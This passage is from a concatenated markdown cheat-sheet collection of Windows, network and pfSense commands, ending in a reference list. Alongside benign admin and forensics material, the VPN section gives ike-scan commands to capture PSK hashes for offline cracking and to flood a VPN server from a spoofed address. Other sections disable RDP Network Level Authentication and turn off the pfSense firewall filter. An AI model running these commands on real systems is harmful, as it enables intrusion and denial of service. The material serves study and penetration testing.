net start termservice 18 | 19 | ### Disable Network Level Authentication, Add Firewall Exception 20 | 21 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f 22 | netsh firewall set service type = remotedesktop mode = enable 23 | 24 | UserAuthentication 0 turns Network Level Authentication off, so any client reaches the Windows logon screen before authenticating; 1 is the hardened setting. The netsh firewall context is the Windows XP/2003 syntax; on Vista and later the equivalent is netsh advfirewall firewall set rule group="remote desktop" new enable=Yes. 25 | 26 | [47]: -------------------------------------------------------------------------------- /Collection/Useful Run Commands.md: -------------------------------------------------------------------------------- 1 | # Useful Run Commands [[48]] 2 | 3 | access.cpl # Accessibility Controls 4 | accwiz # Accessibility Wizard 5 | hdwwiz.cpl # Add Hardware Wizard 6 | appwiz.cpl # Add/Remove Programs 7 | control admintools # Administrative Tools 8 | acrobat # Adobe Acrobat (if installed) 9 | formdesigner # Adobe Designer (if installed) 10 | acrodist # Adobe Distiller (if installed) 11 | imageready # Adobe ImageReady (if installed) 12 | photoshop # Adobe Photoshop (if installed) 13 | wuaucpl.cpl # Automatic Updates 14 | fsquirt # Bluetooth Transfer Wizard 15 | calc # Calculator 16 | certmgr.msc # Certificate Manager 17 | charmap # Character Map 18 | chkdsk # Check Disk Utility 19 | clipbrd # Clipboard Viewer 20 | cmd # Command Prompt 21 | dcomcnfg # Component Services 22 | compmgmt.msc # Computer Management 23 | control # Control Panel 24 | timedate.cpl # Date and Time Properties 25 | ddeshare # DDE Shares 26 | devmgmt.msc # Device Manager 27 | directx.cpl # DirectX Control Panel (if installed) 28 | dxdiag # DirectX Troubleshooter 29 | cleanmgr # Disk Cleanup Utility 30 | dfrg.msc # Disk Defragment 31 | diskmgmt.msc # Disk Management 32 | diskpart # Disk Partition Manager 33 | control desktop # Display Properties 34 | desk.cpl # Display Properties 35 | control color # Display Properties (w/Appearance Tab Preselected) 36 | drwtsn32 # Dr.
Watson System Troubleshooting Utility 37 | verifier # Driver Verifier Utility 38 | eventvwr.msc # Event Viewer 39 | migwiz # Files and Settings Transfer Tool 40 | sigverif # File Signature Verification Tool 41 | findfast.cpl # Findfast 42 | firefox # Firefox (if installed) 43 | control folders # Folder Options 44 | control fonts # Fonts 45 | fonts # Fonts Folder 46 | freecell # Free Cell Card Game 47 | joy.cpl # Game Controllers 48 | gpedit.msc # Group Policy Editor (XP Prof) 49 | mshearts # Hearts Card Game 50 | helpctr # Help and Support 51 | hypertrm # HyperTerminal 52 | iexpress # IExpress Wizard 53 | ciadv.msc # Indexing Service 54 | icwconn1 # Internet Connection Wizard 55 | iexplore # Internet Explorer 56 | inetcpl.cpl # Internet Properties 57 | inetwiz # Internet Setup Wizard 58 | ipconfig /all # IP Configuration (Display Connection Configuration) 59 | ipconfig /displaydns # IP Configuration (Display DNS Cache Contents) 60 | ipconfig /flushdns # IP Configuration (Delete DNS Cache Contents) 61 | ipconfig /release # IP Configuration (Release All Connections) 62 | ipconfig /renew # IP Configuration (Renew All Connections) 63 | ipconfig /registerdns # IP Configuration (Refreshes DHCP & Re-Registers DNS) 64 | ipconfig /showclassid # IP Configuration (Display DHCP Class ID) 65 | ipconfig /setclassid # IP Configuration (Modifies DHCP Class ID) 66 | jpicpl32.cpl # Java Control Panel (if installed) 67 | javaws # Java Web Start (if installed) 68 | control keyboard # Keyboard Properties 69 | secpol.msc # Local Security Settings 70 | lusrmgr.msc # Local Users and Groups 71 | logoff # Logs You Out Of Windows 72 | mrt # Malicious Software Removal Tool 73 | msaccess # Microsoft Access (if installed) 74 | winchat # Microsoft Chat 75 | excel # Microsoft Excel (if installed) 76 | frontpg # Microsoft FrontPage (if installed) 77 | moviemk # Microsoft Movie Maker 78 | mspaint # Microsoft Paint 79 | powerpnt # Microsoft PowerPoint (if installed) 80 | winword # Microsoft Word (if
installed) 81 | mobsync # Microsoft Synchronization Tool 82 | winmine # Minesweeper Game 83 | control mouse # Mouse Properties 84 | main.cpl # Mouse Properties 85 | nero # Nero (if installed) 86 | conf # NetMeeting 87 | control netconnections # Network Connections 88 | ncpa.cpl # Network Connections 89 | netsetup.cpl # Network Setup Wizard 90 | notepad # Notepad 91 | nvtuicpl.cpl # nView Desktop Manager (if installed) 92 | packager # Object Packager 93 | odbccp32.cpl # ODBC Data Source Administrator 94 | osk # On Screen Keyboard 95 | ac3filter.cpl # Opens AC3 Filter (if installed) 96 | msimn # Outlook Express 97 | pbrush # Paint 98 | password.cpl # Password Properties 99 | perfmon.msc # Performance Monitor 100 | perfmon # Performance Monitor 101 | telephon.cpl # Phone and Modem Options 102 | dialer # Phone Dialer 103 | pinball # Pinball Game 104 | powercfg.cpl # Power Configuration 105 | control printers # Printers and Faxes 106 | printers # Printers Folder 107 | eudcedit # Private Character Editor 108 | QuickTime.cpl # QuickTime (if installed) 109 | quicktimeplayer # QuickTime Player (if installed) 110 | realplay # RealPlayer (if installed) 111 | intl.cpl # Regional Settings 112 | regedit # Registry Editor 113 | regedt32 # Registry Editor (legacy name; on XP and later it simply launches regedit) 114 | rasphone # Remote Access Phonebook 115 | mstsc # Remote Desktop 116 | ntmsmgr.msc # Removable Storage 117 | ntmsoprq.msc # Removable Storage Operator Requests 118 | rsop.msc # Resultant Set of Policy (XP Prof) 119 | sticpl.cpl # Scanners and Cameras 120 | control schedtasks # Scheduled Tasks 121 | wscui.cpl # Security Center 122 | services.msc # Services 123 | fsmgmt.msc # Shared Folders 124 | shutdown # Shuts Down Windows 125 | mmsys.cpl # Sounds and Audio 126 | spider # Spider Solitaire Card Game 127 | cliconfg # SQL Client Configuration 128 | sysedit # System Configuration Editor 129 | msconfig # System Configuration Utility 130 | sfc /scannow # System File Checker Utility (Scan Immediately) 131 | sfc /scanonce # System
File Checker Utility (Scan Once At The Next Boot) 132 | sfc /scanboot # System File Checker Utility (Scan On Every Boot) 133 | sfc /revert # System File Checker Utility (Return Scan Setting To Default) 134 | sfc /purgecache # System File Checker Utility (Purge File Cache) 135 | sfc /cachesize=x # System File Checker Utility (Sets Cache Size to size x) 136 | msinfo32 # System Information 137 | sysdm.cpl # System Properties 138 | taskmgr # Task Manager 139 | tcptest # TCP Tester 140 | telnet # Telnet Client 141 | tweakui # Tweak UI (if installed) 142 | nusrmgr.cpl # User Account Management 143 | utilman # Utility Manager 144 | wab # Windows Address Book 145 | wabmig # Windows Address Book Import Utility 146 | ntbackup # Windows Backup Utility (if installed) 147 | explorer # Windows Explorer 148 | firewall.cpl # Windows Firewall 149 | magnify # Windows Magnifier 150 | wmimgmt.msc # Windows Management Infrastructure 151 | wmplayer # Windows Media Player 152 | msmsgs # Windows Messenger 153 | wiaacmgr # Windows Picture Import Wizard (needs a camera connected) 154 | syskey # Windows System Security Tool (SAM encryption key; removed in Windows 10 version 1709) 155 | wupdmgr # Launches Windows Update 156 | winver # Windows Version (shows which version of Windows is running) 157 | tourstart # Windows XP Tour Wizard 158 | write # WordPad 159 | [48]: 160 | 161 | 162 | -------------------------------------------------------------------------------- /Collection/Using the PHP pfSense Shell.md: -------------------------------------------------------------------------------- 1 | # Using the PHP pfSense Shell [[49]] 2 | Using the PHP pfSense shell allows configuration of the config.xml file directly without needing to use the webConfigurator.
3 | 4 | ### Options 5 | ![ii.png](https://www.dropbox.com/s/3mhvnw8v1eiql99/ii.png?dl=0&raw=1) 6 | 7 | ### pfSense Developer Shell 8 | 9 | print_r($config); # To output the whole configuration array 10 | print_r($config['interfaces']); # To output the interfaces configuration portion of config.xml 11 | print_r($config['dhcpd']); # To output the DHCP server configuration 12 | exit # To exit the developer shell 13 | print_r(get_wireless_modes("ath0")); # To output supported wireless modes for an interface 14 | $config['system']['enablesshd'] = true; # To enable SSH 15 | $config['interfaces']['optx']['wireless']['standard'] = "11a"; # Change optx to the OPT interface name such as BACKHAUL 16 | $config['interfaces']['optx']['wireless']['mode'] = "hostap"; 17 | $config['interfaces']['optx']['wireless']['channel'] = "6"; 18 | $config['dhcpd']['optx']['enable'] = true; # To enable the DHCP server for an optx interface 19 | $config['dhcpd']['optx']['range']['from'] = "192.168.31.100"; 20 | $config['dhcpd']['optx']['range']['to'] = "192.168.31.150"; 21 | $config['system']['disablefilter'] = true; # Disable the firewall filter (all packet filtering off; the box is an open router until this is reverted) 22 | $config['interfaces']['optx']['disabled'] = false; # Enable an interface and configure it as a DHCP client 23 | $config['interfaces']['optx']['ipaddr'] = "dhcp"; 24 | $config['interfaces']['wan']['enable'] = true; # Enable an interface and set a static IPv4 address 25 | $config['interfaces']['wan']['ipaddr'] = "192.168.100.1"; 26 | $config['interfaces']['wan']['subnet'] = "24"; 27 | write_config(); # Save out the new configuration (config.xml); nothing above takes effect until it is written 28 | system_reboot_sync(); # Reboot the system after saving 29 | 30 | 31 | 32 | [49]: 33 | 34 | -------------------------------------------------------------------------------- /Collection/VPN.md: -------------------------------------------------------------------------------- 1 | # VPN [[50]] 2 | ### Write PSK to a file 3 | 4 | ike-scan -M -A -Pfile vpn_ip # aggressive mode (-A) makes the gateway return the PSK hash, which -Pfile writes to 'file' for offline cracking with psk-crack 5 | 6 | ### DoS VPN SERVER 7 | 8 | ike-scan -A -t 1
--sourceip=spoof_ip dst_ip # floods dst_ip with aggressive-mode proposals carrying a spoofed source address; raw sockets (root) are required 9 | 10 | [50]: 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Collection/WMIC.md: -------------------------------------------------------------------------------- 1 | # WMIC[[51]] 2 | WMIC extends WMI for operation from several command-line interfaces and through batch scripts. Before WMIC, you used WMI-based applications (such as SMS), the WMI Scripting API, or tools such as CIM Studio to manage WMI-enabled computers. Without a firm grasp on a programming language such as C++ or a scripting language such as VBScript and a basic understanding of the WMI namespace, do-it-yourself systems management with WMI was difficult. WMIC changes this situation by giving you a powerful, user-friendly interface to the WMI namespace. 3 | 4 | ### Listing 1: Code to Display Results at the Console from a WMIC Batch File 5 | 6 | wmic /node:SERVER1,SERVER4 cpu get name,caption,maxclockspeed,systemname /format:textvaluelist.xsl 7 | 8 | ### Listing 2: Code to Use Variables in a WMIC Batch File 9 | 10 | @echo off 11 | if "%1"=="" goto msg 12 | if "%2"=="" goto single 13 | wmic /node:%1,%2 cpu get name,caption,maxclockspeed,systemname /format:textvaluelist.xsl 14 | goto end 15 | :single 16 | wmic /node:%1 cpu get name,caption,maxclockspeed,systemname /format:textvaluelist.xsl 17 | goto end 18 | :msg 19 | echo you must specify at least one computer name.
20 | :end 21 | 22 | ### Listing 3: Code to Direct WMIC Output to an HTML File 23 | wmic /node:SERVER4 /output:e:\file1.htm cpu get description,maxclockspeed,extclock,manufacturer,revision /format:hform.xsl 24 | ### Listing 4: Code to Direct Class Command Output to an HTML File 25 | wmic /output:e:\se_class.htm class WIN32_SOFTWAREELEMENT get 26 | ### Listing 5: Code to Generate XML Output from a WMIC Command 27 | wmic cpu get maxclockspeed /translate:basicxml /format:rawxml.xsl 28 | [51]: -------------------------------------------------------------------------------- /Collection/Windows Net_Domain Commands.md: -------------------------------------------------------------------------------- 1 | # Windows Net/Domain Commands[[52]] 2 | 3 | ### Net user - Syntax 4 | 5 | net user [<UserName> [<Password> | *] [<Options>]] [/domain] 6 | net user [<UserName> {<Password> | *} /add [<Options>] [/domain]] 7 | net user [<UserName> [/delete] [/domain]] 8 | 9 | ### Net view - Examples 10 | 11 | net view \\production # To see a list of the resources shared by the \\Production computer 12 | net view /domain:sales # To see a list of the computers in the sales domain or workgroup 13 | 14 | ### Net view - Syntax 15 | 16 | net view [\\ComputerName [/CACHE] | [/ALL] | /DOMAIN[:DomainName]] 17 | 18 | ### Net group - Syntax 19 | 20 | net group [<GroupName> [/comment:"<Text>"]] [/domain] 21 | net group [<GroupName> {/add [/comment:"<Text>"] | /delete} [/domain]] 22 | net group [<GroupName> <UserName> [<UserName> ...]
{/add | /delete} [/domain]] 23 | 24 | ### Net group - Examples 25 | 26 | net group # This example lists all the groups on the local server 27 | net group exec /add # This example adds a group called Exec to the local user accounts database 28 | net group exec /add /domain # This example adds a group called Exec to the domain database 29 | net group exec estherv ralfr stevent /add # This example adds the existing user accounts estherv, ralfr, and stevent to the Exec group on the local computer 30 | net group exec estherv ralfr stevent /add /domain # This example adds the existing user accounts estherv, ralfr, and stevent to the Exec group in the domain database 31 | net group exec # This example displays users in the Exec group 32 | net group exec /comment:"The executive staff" # This example adds a comment to the Exec group record 33 | 34 | [52]: 35 | 36 | -------------------------------------------------------------------------------- /Collection/Windows Network Commands.md: -------------------------------------------------------------------------------- 1 | # Windows network commands[[53]] 2 | 3 | $ Arp # Display or manipulate the ARP cache (IP-to-MAC mappings) of a network device or computer. 4 | $ Finger # The finger command, available in Unix and Linux variants, queries a host's finger daemon for information about a user (login name, home directory, idle time and sometimes personal details). 5 | $ Hostname # The hostname command displays the host name of the local computer 6 | $ Ipconfig # Display the network settings currently assigned to the adapters, whether static or given by DHCP 7 | $ Pathping # Pathping is a command-line utility available since Windows 2000 that combines ping and tracert.
This utility enables a user to find network latency and packet loss at each hop 8 | $ Ping # Pinging another address helps determine whether the network card can communicate within the local network or with an outside network 9 | $ Nbtstat # The nbtstat utility displays protocol statistics and current TCP/IP connections using NetBIOS over TCP/IP (NBT), including the remote name table 10 | $ Net # The net command is available in MS-DOS and Windows and is used to set, view, and determine network settings 11 | $ Netstat # The netstat command is used to display TCP/IP network protocol statistics, active connections and listening ports 12 | $ Nslookup # The nslookup utility queries DNS for the IP address of a host name or, as a reverse lookup, the host name of an IP address 13 | $ Route # The route utility enables the user to view and modify the computer's routing table 14 | $ Tracert and traceroute # Show how a network packet travels through the network, hop by hop, and where it may fail or slow down 15 | $ Whois # The whois command available in Unix and Linux variants helps a user identify the registrant of a domain name. This command provides information about a domain name much like the WHOIS on Network Solutions. 16 | $ Winipcfg # The winipcfg command, available in Windows 9x/Me (ipconfig replaces it on NT-based Windows), displays network and network adapter information such as the IP address, subnet mask and gateway.
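The Arp entry above only says what the command does. The PowerShell below is an added example, not from the ComputerHope source, that parses Windows `arp -a` output into objects and applies one ARP-spoofing check practitioners run on it: the same MAC address answering for more than one IP address on an interface, which is what a host poisoning the gateway entry looks like from a victim. The sample table is constructed; the broadcast and IPv4 multicast entries are excluded because they legitimately repeat.

```powershell
# Added example: parse Windows `arp -a` and flag one MAC claiming several IPs.
function ConvertFrom-ArpTable {
    param([Parameter(Mandatory)][string[]]$Lines)
    $iface = $null
    foreach ($line in $Lines) {
        # "Interface: 192.168.1.10 --- 0xb" starts each adapter's table
        if ($line -match '^\s*Interface:\s+(\S+)') { $iface = $Matches[1]; continue }
        # "  192.168.1.1    00-11-22-33-44-55    dynamic"  (-match is case-insensitive)
        if ($line -match '^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(\w+)') {
            [pscustomobject]@{
                Interface = $iface
                IPAddress = $Matches[1]
                MAC       = $Matches[2].ToLower()
                Type      = $Matches[3]
            }
        }
    }
}

function Find-DuplicateArpMac {
    param([Parameter(Mandatory)][object[]]$Entries)
    $Entries |
        # broadcast and IPv4 multicast (01-00-5e-...) map many IPs to one MAC by design
        Where-Object { $_.MAC -ne 'ff-ff-ff-ff-ff-ff' -and $_.MAC -notlike '01-00-5e-*' } |
        Group-Object Interface, MAC |
        Where-Object Count -gt 1 |
        ForEach-Object {
            [pscustomobject]@{
                Interface   = $_.Group[0].Interface
                MAC         = $_.Group[0].MAC
                IPAddresses = ($_.Group | ForEach-Object IPAddress) -join ', '
            }
        }
}

# Constructed sample: the gateway (.1) and a workstation (.77) share a MAC,
# the classic picture on a victim whose gateway entry has been poisoned.
$sampleArp = @'
Interface: 192.168.1.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.25          aa-bb-cc-dd-ee-01     dynamic
  192.168.1.77          00-11-22-33-44-55     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
'@ -split "`r?`n"

$entries = ConvertFrom-ArpTable -Lines $sampleArp
# Expected: one row, MAC 00-11-22-33-44-55 with IPAddresses "192.168.1.1, 192.168.1.77"
Find-DuplicateArpMac -Entries $entries | Format-Table -AutoSize

# Live check on the local machine:
# Find-DuplicateArpMac -Entries (ConvertFrom-ArpTable -Lines (arp -a))
```

A MAC with several IPs is also what a router with secondary addresses or a host running several virtual adapters looks like, so treat a hit as a lead to confirm (compare the gateway's MAC against the switch or DHCP server's record) rather than proof of spoofing. The regex matches the Windows `arp -a` layout; Linux `arp -a` prints a different format.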
17 | 18 | 19 | 20 | [53]: 21 | 22 | -------------------------------------------------------------------------------- /Collection/Windows System Info Commands.md: -------------------------------------------------------------------------------- 1 | # Systeminfo[[54]] 2 | 3 | ### Syntax 4 | 5 | systeminfo [/s <Computer> [/u <Domain>\<User> [/p <Password>]]] [/fo {TABLE | LIST | CSV}] [/nh] 6 | 7 | /s # Specifies the name or IP address of a remote computer 8 | /u # Runs the command with the account permissions of the specified user account 9 | /p # Specifies the password of the user account that is specified in the /u parameter 10 | /fo # Specifies the output format 11 | /nh # Suppresses column headers in the output. 12 | /? # Displays help at the command prompt. 13 | 14 | # Tasklist 15 | 16 | ### Syntax 17 | 18 | tasklist[.exe] [/s computer] [/u domain\user [/p password]] [/fo {TABLE|LIST|CSV}] [/nh] [/fi FilterName [/fi FilterName2 [ ... ]]] [/m [ModuleName] | /svc | /v] 19 | # Reg query 20 | 21 | ### Syntax 22 | reg query <KeyName> [{/v <ValueName> | /ve}] [/s] [/se <Separator>] [/f <Data>] [{/k | /d}] [/c] [/e] [/t <Type>] [/z] 23 | 24 | /ve # Runs a query for value names that are empty (the default value) 25 | /s # Specifies to query all subkeys and value names recursively 26 | /se # Specifies the single value separator to search for in the value name type REG_MULTI_SZ 27 | /f # Specifies the data or pattern to search for 28 | /k # Specifies to search in key names only 29 | /d # Specifies to search in data only 30 | /c # Specifies that the query is case sensitive 31 | /e # Specifies to return only exact matches 32 | /t # Specifies registry types to search 33 | /z # Specifies to include the numeric equivalent for the registry type in search results 34 | 35 | 36 | [54]: -------------------------------------------------------------------------------- /Collection/Windows Versions.md: -------------------------------------------------------------------------------- 1 | # Windows Versions [[55]] 2 | 3 | NT 3.1 # Windows NT 3.1 (All) 4 | NT 3.5 # Windows NT 3.5 (All) 5
| NT 3.51 # Windows NT 3.51 (All) 6 | NT 4.0 # Windows NT 4.0 (All) 7 | NT 5.0 # Windows 2000 (All) 8 | NT 5.1 # Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded) 9 | NT 5.2 # Windows XP (64-bit, Pro 64-bit), Windows Server 2003 & R2 (Standard, Enterprise), Windows Home Server 10 | NT 6.0 # Windows Vista (Starter, Home Basic, Home Premium, Business, Enterprise, Ultimate), Windows Server 2008 (Foundation, Standard, Enterprise) 11 | NT 6.1 # Windows 7 (Starter, Home, Pro, Enterprise, Ultimate), Windows Server 2008 R2 (Foundation, Standard, Enterprise) 12 | NT 6.2 # Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)), Windows Phone 8, Windows Server 2012 (Foundation, Essentials, Standard) 13 | NT 6.3 # Windows 8.1 (Pro, Enterprise), Windows Server 2012 R2 (Foundation, Essentials, Standard, Datacenter) 14 | NT 10.0 # Windows 10 (Home, Pro, Pro Education, Enterprise, Enterprise LTSB, Education, Mobile, Mobile Enterprise, IoT Core, IoT Enterprise, IoT Mobile Enterprise), Windows Server 2016 (Essentials, Standard, Datacenter) 15 | 16 | [55]: 17 | 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /Collection/Windows registry.md: -------------------------------------------------------------------------------- 1 | # Windows registry[[56]] 2 | 3 | ### Structure of the Windows Registry (hives) 4 | 5 | HKEY_CLASSES_ROOT # File-type associations and COM class registrations (a merged view of HKLM\Software\Classes and HKCU\Software\Classes); it decides which program opens a file launched from Windows Explorer.
6 | HKEY_CURRENT_USER # Configuration of the user who is currently logged on, including the user's folders, screen colors and Control Panel settings (a link to that user's subkey under HKEY_USERS) 7 | HKEY_LOCAL_MACHINE # Machine-wide configuration the operating system runs on: hardware, installed software and the SAM, SECURITY, SOFTWARE and SYSTEM hives 8 | HKEY_USERS # Configuration of all loaded user profiles on the system, including application configuration and visual settings 9 | HKEY_CURRENT_CONFIG # The system's current hardware profile; an alias for HKLM\SYSTEM\CurrentControlSet\Hardware Profiles\Current 10 | 11 | ### Autorun locations 12 | 13 | HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 14 | HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 15 | HKLM\Software\Microsoft\Windows\CurrentVersion\Run 16 | HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run 17 | HKCU\Software\Microsoft\Windows\CurrentVersion\Run 18 | HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 19 | (ProfilePath)\Start Menu\Programs\Startup 20 | 21 | ### MRU lists 22 | 23 | MRU ('most recently used') lists record specific actions performed by the user; there are numerous MRU lists spread across various Registry keys. RunMRU, for example, holds what was typed into the Run dialog. 24 | 25 | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU 26 | 27 | ### UserAssist 28 | The UserAssist key contains two or more subkeys with long hexadecimal names that are globally unique identifiers (GUIDs). Each subkey records values for objects the user has accessed on the system, such as Control Panel applets, shortcut files and programs. 29 | 30 | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist 31 | 32 | The value names are obfuscated with ROT13, a Caesar cipher with a fixed shift of 13: each letter A-Z or a-z is replaced by the letter 13 positions further on in the alphabet, wrapping around, while digits, punctuation and path separators are left unchanged. Because 13 is half of 26 the transformation is its own inverse, so applying it again decodes the names (the session counter HRZR_PGYFRFFVBA, for example, decodes to UEME_CTLSESSION); it provides obscurity, not secrecy.
33 | With the UserAssist key, a forensic examiner can gain a better understanding of what types of files or applications have been accessed on a particular system. 34 | 35 | ### Wireless networks 36 | 37 | HKLM\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces # SSIDs of wireless networks joined (Wireless Zero Configuration, Windows XP) 38 | HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\ # per-adapter TCP/IP parameters (DHCP lease, IP address, gateway, DNS) for each network the host joined 39 | 40 | ### LAN computers 41 | 42 | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComputerDescriptions # List of devices seen on the network, including desktop computers, laptops and printers 43 | 44 | ### USB Devices 45 | 46 | HKLM\SYSTEM\ControlSet00x\Enum\USBSTOR # Stores the vendor, product and device ID (serial number) of every USB storage device that has ever been connected to the system 47 | 48 | ### Mounted devices 49 | 50 | HKLM\SYSTEM\MountedDevices # Database of mounted volumes used by the NTFS file system; it maps drive letters and volume GUIDs to device identifiers, including USBSTOR serials, so it ties a USB device to the letter it was mounted under 51 | 52 | ### Firefox 53 | Firefox leaves few footprints in the Registry. Firefox 2 and earlier store web history in history.dat, a plain-text (Mork format) file readable when opened; Firefox 3 and later keep history in places.sqlite in the same profile directory. 54 | 55 | C:\Documents and Settings\User Profile\Application Data\Mozilla\Firefox\Profiles\x.default\ 56 | 57 | 58 | [56]: -------------------------------------------------------------------------------- /Literatura.md: -------------------------------------------------------------------------------- 1 | # References 2 | 3 | 1. Arcege, Problem answer, accessed 16.01.2017 at http://unix.stackexchange.com/a/19015 4 | 2. ArrOway, Penetration Testing Tools Cheat Sheet, accessed 16.01.2017 at https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#brute-forcing-services 5 | 3. redhat, Using the chkconfig Utility, accessed 16.01.2017 at https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Deployment_Guide/s2-services-chkconfig.html 6 | 4. Cisco, Using the Command-Line Interface, accessed 16.01.2017
at http://www.cisco.com/c/en/us/td/docs/ios/12_2/configfun/configuration/guide/ffun_c/fcf001.html 7 | 5. Davis, 10 commands you should master when working with the Cisco IOS, accessed 16.01.2017 at http://www.techrepublic.com/blog/data-center/10-commands-you-should-master-when-working-with-the-cisco-ios-104071/ 8 | 6. Stretch J., Common ports, accessed 16.01.2017 at http://packetlife.net/media/library/23/common_ports.pdf 9 | 7. Shrestha N., 12 Tcpdump Commands – A Network Sniffer Tool, accessed 16.01.2017 at http://www.tecmint.com/12-tcpdump-commands-a-network-sniffer-tool/ 10 | 8. NMAP, Nmap Network Scanning, accessed 16.01.2017 at https://nmap.org/book/output-formats-grepable-output.html 11 | 9. ArrOway et al., 2016. 12 | 10. Glenn W., The Best Tools Hidden in Windows' Command Line, accessed 16.01.2017 at http://lifehacker.com/the-best-tools-hidden-in-windows-command-line-1553193077 13 | 11. Occupytheweb, How to Cover Your Tracks & Leave No Trace Behind on the Target System, accessed 16.01.2017 at http://null-byte.wonderhowto.com/how-to/hack-like-pro-cover-your-tracks-leave-no-trace-behind-target-system-0148123/ 14 | 12. Hauser, How to cover your tracks, accessed 16.01.2017 at http://www.ouah.org/cover_your_tracks1.html 15 | 13. DGhost, Banning an entire country with IPTables/IPSet, accessed 16.01.2017 at http://www.dghost.com/techno/internet/banning-an-entire-country-with-iptablesipset 16 | 14. Brown K., The Beginner’s Guide to iptables, the Linux Firewall, accessed 16.01.2017 at http://www.howtogeek.com/177621/the-beginners-guide-to-iptables-the-linux-firewall/ 17 | 15. Allard C., Cohen D., IPCHAINS Firewall Example,     accessed 16.01.2017 at http://oceanpark.com/notes/firewall_example.html 18 | 16. Harrison P., Linux Firewalls Using iptables, accessed 16.01.2017 at http://www.linuxhomenetworking.com/wiki/index.php/Quick_HOWTO_:_Ch14_:_Linux_Firewalls_Using_iptables#.WH1DaNRACdK 19 | 17.
Wikipedia, Classful network, accessed 16.01.2017 at https://en.wikipedia.org/wiki/Classful_network 20 | 18. Wikipedia, Reserved IP addresses, accessed 16.01.2017 at https://en.wikipedia.org/wiki/Reserved_IP_addresses 21 | 19. Tutorialspoint, IPv4 - Subnetting, accessed 16.01.2017 at https://www.tutorialspoint.com/ipv4/ipv4_subnetting.htm 22 | 20. Jodies K., IP-Calculator, accessed 16.01.2017 at http://jodies.de/ipcalc?host=192.168.0.1&mask1=24&mask2= 23 | 21. oej, IPv6: Goodbye to broadcast, say hello to Multicast, http://ipv6friday.org/blog/2011/12/ipv6-multicast/ 24 | 22. R. Hinden, S. Deering, IP Version 6 Addressing Architecture, accessed 16.01.2017 at https://tools.ietf.org/html/rfc4291#appendix-A 25 | 23. ports, THC-IPV6, accessed 16.01.2017 at http://tools.kali.org/information-gathering/thc-ipv6 26 | 24. TechLog360, A-Z Kali Linux Commands, accessed 16.01.2017 at https://techlog360.com/a-z-kali-linux-commands/ 27 | 25. penguintutor, Linux misc commands quick reference guide, accessed 16.01.2017 at http://www.penguintutor.com/linux/misc-quickreference 28 | 26. Cobbaut P., Linux networking, accessed 16.01.2017 at http://linux-training.be/linuxnet.pdf 29 | 27. Superuser, Bash scripting Tutorial, accessed 16.01.2017 at https://linuxconfig.org/bash-scripting-tutorial 30 | 28. SuperJediWombat, Answer, accessed 16.01.2017 at http://www.commandlinefu.com/commands/view/3144/ping-sweep-without-nmap 31 | 29. Superuser, How to crash your Linux system with fork bomb, accessed 16.01.2017 at https://linuxconfig.org/how-to-crash-your-linux-system-with-fork-bomb 32 | 30. Tenzer, Answer, accessed 16.01.2017 at https://www.zabbix.com/forum/showpost.php?p=31561&postcount=2 33 | 31. tokind, Complete recipe for monitoring DNS and NTP on your Network, accessed 16.01.2017 at https://www.zabbix.com/forum/showpost.php?p=31549&postcount=1 34 | 32. Phillips T., Shell Scripting Crash Course, accessed 16.01.2017
at http://wiki.jaxhax.org/images/9/94/Shell_Scripting_Crash_Course.pdf 35 | 33. Gite V., Linux Iptables Firewall Shell Script For Standalone Server, accessed 16.01.2017 at https://bash.cyberciti.biz/firewall/linux-iptables-firewall-shell-script-for-standalone-server/ 36 | 34. Moon S., 16 commands to check hardware information on Linux, accessed 16.01.2017 at http://www.binarytides.com/linux-commands-hardware-info/ 37 | 35. LinuxCommand.org, Manipulating Files, accessed 16.01.2017 at http://linuxcommand.org/lts0050.php 38 | 36. ArrOway et al., 2016. 39 | 37. Clark B., Red Team Field Manual, accessed 16.01.2017 at https://watchthestack.files.wordpress.com/2015/03/rtfm-red-team-field-manual.pdf 40 | 38. Shrestha N. et al., 2012. 41 | 39. ArrOway et al., 2016. 42 | 40. ss64, An A-Z Index of Windows PowerShell commands, accessed 16.01.2017 at http://ss64.com/ps/ 43 | 41. Russinovich M., PsExec v2.11, accessed 16.01.2017 at https://technet.microsoft.com/en-us/sysinternals/pxexec.aspx 44 | 42. Jofre J., Running Remote Commands, accessed 16.01.2017 at https://msdn.microsoft.com/en-us/powershell/scripting/core-powershell/running-remote-commands 45 | 43. Mauro D., Schmidt K., Essential SNMP, accessed 17.01.2017 at http://www.cert.hr/sites/default/files/NCERT-PUBDOC-2010-09-313.pdf 46 | 44. Oracle, SNMP Command Examples, accessed 17.01.2017 at https://docs.oracle.com/cd/E19201-01/820-6413-13/SNMP_commands_reference_appendix.html 47 | 45. Clark B. et al., 2013. 48 | 46. Clark B. et al., 2013. 49 | 47. TechNet, How Terminal Services Works, accessed 17.01.2017 at https://technet.microsoft.com/en-us/library/cc755399(v=ws.10).aspx 50 | 48. mypcshell, 156 Useful Run Commands, accessed 17.01.2017 at http://mypchell.com/guides/34-guides/69-156-useful-run-commands 51 | 49. pfSense, Using the PHP pfSense Shell, accessed 17.01.2017 at https://doc.pfsense.org/index.php/Using_the_PHP_pfSense_Shell 52 | 50.
